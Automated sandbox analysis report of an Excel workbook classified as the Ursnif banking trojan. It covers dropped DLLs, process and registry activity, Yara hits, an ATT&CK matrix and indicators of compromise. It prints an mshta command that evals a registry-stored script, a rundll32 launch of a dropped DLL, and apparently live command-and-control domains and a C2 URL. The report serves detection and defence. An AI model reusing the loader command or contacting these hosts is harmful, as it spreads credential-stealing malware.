Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://tasks.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\fsh\87.dll			Jump to dropped file

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winXLSB@11/20@12/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{F1020262-3A5E-4343-9586-95E15C7BFAD3} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: File_78476.xlsb	Initial sample: OLE zip file path = docProps/thumbnail.wmf
Source: File_78476.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: File_78476.xlsb	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb source: 11[1].dll.0.dr

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\fsh\87.dll			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\ProgramData\fsh\87.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll

Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution4	Logon Script (Windows)	Logon Script (Windows)	Rundll321	Security Account Manager	System Information Discovery12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
File_78476.xlsb	2%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.3.rundll32.exe.5c694a0.1.unpack	100%	Avira	HEUR/AGEN.1132033		Download File
1.3.rundll32.exe.59ee4a0.2.unpack	100%	Avira	HEUR/AGEN.1132033		Download File

Domains

Source	Detection	Scanner	Link
cabogrupo.co.mz	0%	Virustotal	Browse
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS	0%	Avira URL Cloud	safe
